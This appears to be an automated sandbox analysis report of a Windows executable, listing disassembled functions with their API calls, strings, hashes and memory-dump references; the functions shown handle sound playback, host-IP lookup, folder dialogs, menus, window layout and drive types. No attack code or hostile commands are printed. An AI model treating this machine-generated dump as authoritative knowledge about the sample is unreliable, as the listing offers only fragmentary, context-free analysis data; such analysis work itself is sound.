Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: f7582c31b8593709072e8f042a2a522ee123355d8c414170388eafd76909f40a
Instruction ID: 365b25aa880b8c0f5fe391e431b00bf42c17c68f4a481caf837d346e894c9ba0
Opcode Fuzzy Hash: f7582c31b8593709072e8f042a2a522ee123355d8c414170388eafd76909f40a
Instruction Fuzzy Hash: 5F215E7290021EEBCF15EF90CC4AEFE7779BF18300F044869F515661A2EB79AA18DB51

Function 007A52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

Part of subcall function 00747924: _memmove.LIBCMT ref: 007479AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007A5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007A5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007A5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007A537A

Strings

open , xrefs: 007A52DF
play PlayMe wait, xrefs: 007A5364
status PlayMe mode, xrefs: 007A532B
play PlayMe, xrefs: 007A5375
close PlayMe, xrefs: 007A5341, 007A536E
alias PlayMe, xrefs: 007A5309

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 55dbf39f0e35cc6bd7c09a8a01bde82dd425cdd19155d6742292e20c5740fb8e
Instruction ID: 20d022d831d78bacf9aaea7ae0da557d44d77c34b4c44f2ad7da4ab9bf267c68
Opcode Fuzzy Hash: 55dbf39f0e35cc6bd7c09a8a01bde82dd425cdd19155d6742292e20c5740fb8e
Instruction Fuzzy Hash: 0511866195011DB9DB64F7A1CC49EFF7B7CEBD2B44F400419B511921D1DFA81D04C9B1

Function 007A46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 007A46D2
gethostname.WS2_32(?,00000100), ref: 007A46EC
gethostbyname.WS2_32(?), ref: 007A46F9
_wcscpy.LIBCMT ref: 007A4721
_memmove.LIBCMT ref: 007A4734
inet_ntoa.WS2_32(?), ref: 007A473F
_strcat.LIBCMT ref: 007A474D
_wcscpy.LIBCMT ref: 007A4764
WSACleanup.WS2_32 ref: 007A4772
_wcscpy.LIBCMT ref: 007A4780

Strings

0.0.0.0, xrefs: 007A471B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 03a5be2b46615292fa19a85e32ad03b77e68e82a3c6ddc5951317b8aa02afb96
Instruction ID: 5c4054c4359752277602e63c85b653f9db510cd339411e0d2a00e1b85fe98669
Opcode Fuzzy Hash: 03a5be2b46615292fa19a85e32ad03b77e68e82a3c6ddc5951317b8aa02afb96
Instruction Fuzzy Hash: C911E771500114AFCB10AB309C4AEEA77BCEF83711F0442BAF84696092EFBE9D818A50

Function 007AD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

CoInitialize.OLE32(00000000), ref: 007AD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007AD67D
SHGetDesktopFolder.SHELL32(?), ref: 007AD691
CoCreateInstance.COMBASE(007D2D7C,00000000,00000001,007F8C1C,?), ref: 007AD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007AD74C
CoTaskMemFree.COMBASE(?), ref: 007AD7A4
_memset.LIBCMT ref: 007AD7E1
SHBrowseForFolderW.SHELL32(?), ref: 007AD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007AD840
CoTaskMemFree.COMBASE(00000000), ref: 007AD847
CoTaskMemFree.COMBASE(00000000), ref: 007AD87E
CoUninitialize.COMBASE ref: 007AD880

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 1939fc319e540d57f9b7ef970121b31f899da25cb7600e16872f16ce2347bbc5
Instruction ID: 6cd7c88f7e5b88043e33e2510ca3f20e40c4c67a767d9e98ddfa6751e36459b7
Opcode Fuzzy Hash: 1939fc319e540d57f9b7ef970121b31f899da25cb7600e16872f16ce2347bbc5
Instruction Fuzzy Hash: C1B1FC75A00109EFDB14DFA4C888DAEBBB9FF89314B148569F90ADB261DB34ED41CB50

Function 0079C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0079C283
GetWindowRect.USER32(00000000,?), ref: 0079C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0079C2F3
GetDlgItem.USER32(?,00000002), ref: 0079C2FE
GetWindowRect.USER32(00000000,?), ref: 0079C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0079C364
GetDlgItem.USER32(?,000003E9), ref: 0079C372
GetWindowRect.USER32(00000000,?), ref: 0079C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0079C3C6
GetDlgItem.USER32(?,000003EA), ref: 0079C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0079C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0079C3FE

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 65aec01759399d8081ecf319509e8d8bac573fdfec0a3ff43556a16b039d0409
Instruction ID: 22faaaf20ba27f712b62fad9fdf73080e0f5737eaba85e5adec53735e09abb05
Opcode Fuzzy Hash: 65aec01759399d8081ecf319509e8d8bac573fdfec0a3ff43556a16b039d0409
Instruction Fuzzy Hash: 6B512B71B00205ABDF18CFA9DD99EAEBBBAEB88711F14C12DF516E6290D7749D008B14

Function 007421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

GetSysColor.USER32(0000000F), ref: 007421D3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: fd8e504da9ad25fde5b6f0b8ae703a60b87d9d5438823d40f0ebe0da91ef240e
Instruction ID: 2af435ac430fbd369eb40dd0e0c27723ca6ae0450429b484326bbecfd72a4019
Opcode Fuzzy Hash: fd8e504da9ad25fde5b6f0b8ae703a60b87d9d5438823d40f0ebe0da91ef240e
Instruction Fuzzy Hash: 0741C331000554DFDF215F28EC88BB93B66FB06331F698269FE658A1E2C7798C52DB25

Function 007AA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,007CF910), ref: 007AA90B
GetDriveTypeW.KERNEL32(00000061,007F89A0,00000061), ref: 007AA9D5
_wcscpy.LIBCMT ref: 007AA9FF

Strings

network, xrefs: 007AA969
unknown, xrefs: 007AA996
fixed, xrefs: 007AA953
cdrom, xrefs: 007AA927
all, xrefs: 007AA911
removable, xrefs: 007AA93D
ramdisk, xrefs: 007AA97F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: cc136515b229673cbbda35179ace887b2e338a928e1faa1dd54be4d787b5bf88
Instruction ID: 783b82fb6a90b0f350b449ae62eff6ea1026f331b1a59ddce58832ffd073d755
Opcode Fuzzy Hash: cc136515b229673cbbda35179ace887b2e338a928e1faa1dd54be4d787b5bf88
Instruction Fuzzy Hash: 81519F31108301EBC704EF14C896A6FB7E9EF85344F10892DF996572A2DB79E909CB93

Function 007C8645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007C86FF

Strings

@U=u, xrefs: 007C8735

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 240f538c52301d1985dce0bc435cf0bf3c950d2e3c5a65f95d20ca85f73a58c1
Instruction ID: c95254c78f7aaed9f8854fa96bb591d16dcd328d05208f328651cdae5283d1ea
Opcode Fuzzy Hash: 240f538c52301d1985dce0bc435cf0bf3c950d2e3c5a65f95d20ca85f73a58c1
Instruction Fuzzy Hash: 2451C330510244FEEFA09B68DC89FAD7BA5FB05320F60411EF910E65E2DF79A990DB52

Function 00742B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0077C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0077C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0077C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0077C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0077C370
DestroyCursor.USER32(00000000), ref: 0077C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0077C39C
DestroyCursor.USER32(?), ref: 0077C3AB

Part of subcall function 007CA4AF: DeleteObject.GDI32(00000000), ref: 007CA4E8

Strings

@U=u, xrefs: 0077C370, 0077C39C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
String ID: @U=u
API String ID: 2975913752-2594219639
Opcode ID: 8acb641717902920778b210f86ce7bed1fa79bc22a95b6d7164d2710ef6a46c4
Instruction ID: fb8160a88128ee5a44ed4c2446f35e65e2ce8fe9bdc17a714596287787070508
Opcode Fuzzy Hash: 8acb641717902920778b210f86ce7bed1fa79bc22a95b6d7164d2710ef6a46c4
Instruction Fuzzy Hash: 60517A70600209EFDB24DF64CC45FAA3BA5FB48350F50852CF906972A1DB78ADA1DB60

Function 00749837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00749862
__swprintf.LIBCMT ref: 007498AC
__i64tow.LIBCMT ref: 0077F5E6

Strings

True, xrefs: 0077F5A7
0x%p, xrefs: 0077F5C8
False, xrefs: 0077F5AE
%.15g, xrefs: 007498A6

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 42a64b29d5e5a60b69cffb8ac68a5ad2cb3a57a2895fb85b59a681278503cf53
Instruction ID: 6dafaf4bb83a6b0c8baa059c3746057a6558162ce934630a0c5610d5dc91e2b9
Opcode Fuzzy Hash: 42a64b29d5e5a60b69cffb8ac68a5ad2cb3a57a2895fb85b59a681278503cf53
Instruction Fuzzy Hash: 4841E371600205EFDB24DF38D946E7AB3E8EF45300F20446EEA4AD7292EB399D12CB11

Function 00756192 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00756248
_memmove.LIBCMT ref: 007562E4
_memset.LIBCMT ref: 00756308

Strings

ERCP, xrefs: 007561B3
failed to get memory, xrefs: 00756326
argument not compiled in 16 bit mode, xrefs: 00790D77
3cu, xrefs: 007562AF
internal error: opcode not recognized, xrefs: 0075631B
argument is not a compiled regular expression, xrefs: 00790D87
internal error: missing capturing bracket, xrefs: 00790D7F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cu$ERCP$argument is not a compiled regular expression$argument not compiled in 16 bit mode$failed to get memory$internal error: missing capturing bracket$internal error: opcode not recognized
API String ID: 2532777613-2501647492
Opcode ID: e90b2f11de658d5424ae5931ca9fbfd835775df7149f5cfc15db9f074afaf713
Instruction ID: cff5cc3fe7594bc69f5f51d969e14a74110924bf6dcc1d8e5ec2bc61b31b4b6b
Opcode Fuzzy Hash: e90b2f11de658d5424ae5931ca9fbfd835775df7149f5cfc15db9f074afaf713
Instruction Fuzzy Hash: A951A071A00709DFDB24CF65C8457EAB7E4FF04315F60456EE94AC7251E7B8AA48CB80

Function 007C7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C716A
CreateMenu.USER32 ref: 007C7185
SetMenu.USER32(?,00000000), ref: 007C7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C7221
IsMenu.USER32(?), ref: 007C7237
CreatePopupMenu.USER32 ref: 007C7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C726E
DrawMenuBar.USER32 ref: 007C7276

Strings

0, xrefs: 007C7160
F, xrefs: 007C7262

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 60c561a8a9e4ee822a74c83b605f91b8998137266000ba1d7cf1568d259de4f7
Instruction ID: 6efb5b8189ea94688a043e063f5510e6af2fd7579f8bc66843681a3067bdb180
Opcode Fuzzy Hash: 60c561a8a9e4ee822a74c83b605f91b8998137266000ba1d7cf1568d259de4f7
Instruction Fuzzy Hash: BD412575A01209EFDB14DF64D948F9A7BB5FB48350F14402DFA4597361DB35A920CFA0

Function 00798F8F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 0079AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0079AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00799014
GetDlgCtrlID.USER32 ref: 0079901F
GetParent.USER32 ref: 0079903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0079903E
GetDlgCtrlID.USER32(?), ref: 00799047
GetParent.USER32(?), ref: 00799063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00799066

Strings

@U=u, xrefs: 00799066
ComboBox, xrefs: 00798F9C
ListBox, xrefs: 00798FD1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: a1e5818cf9233985d31a4040f53f24e169e448d7f87f24c1e9178d2d07cf358c
Instruction ID: f59d193600269e47471bba65d48f3c6dac6637e64a45170948e7f6ed7636d642
Opcode Fuzzy Hash: a1e5818cf9233985d31a4040f53f24e169e448d7f87f24c1e9178d2d07cf358c
Instruction Fuzzy Hash: 2321B374A00109FBDF05ABA4DC89EFEBB75EF49310F104119FA61A72A2DB7D9815DB20

Function 0079907A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 0079AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0079AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007990FD
GetDlgCtrlID.USER32 ref: 00799108
GetParent.USER32 ref: 00799124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00799127
GetDlgCtrlID.USER32(?), ref: 00799130
GetParent.USER32(?), ref: 0079914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0079914F

Strings

@U=u, xrefs: 0079914F
ComboBox, xrefs: 00799087
ListBox, xrefs: 007990BC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: 11edfe42a98d10e12c15a53b65494decd6984351714886645a3070ab9671f668
Instruction ID: 6fafbc49f7da9dbfe92f2a83dc8bcbb1ca66c09e94df5723fabe1c192d4881de
Opcode Fuzzy Hash: 11edfe42a98d10e12c15a53b65494decd6984351714886645a3070ab9671f668
Instruction Fuzzy Hash: 7C21D774A40109FBDF05ABA8DC89EFEBB75EF48300F104019FA61A72A2DB7D5815DB21

Function 00799163 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0079916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00799184
_wcscmp.LIBCMT ref: 00799196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00799211

Strings

largeicons, xrefs: 007991A5
details, xrefs: 007991BF
SHELLDLL_DefView, xrefs: 00799190
@U=u, xrefs: 00799211
smallicons, xrefs: 007991D9
list, xrefs: 007991F3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
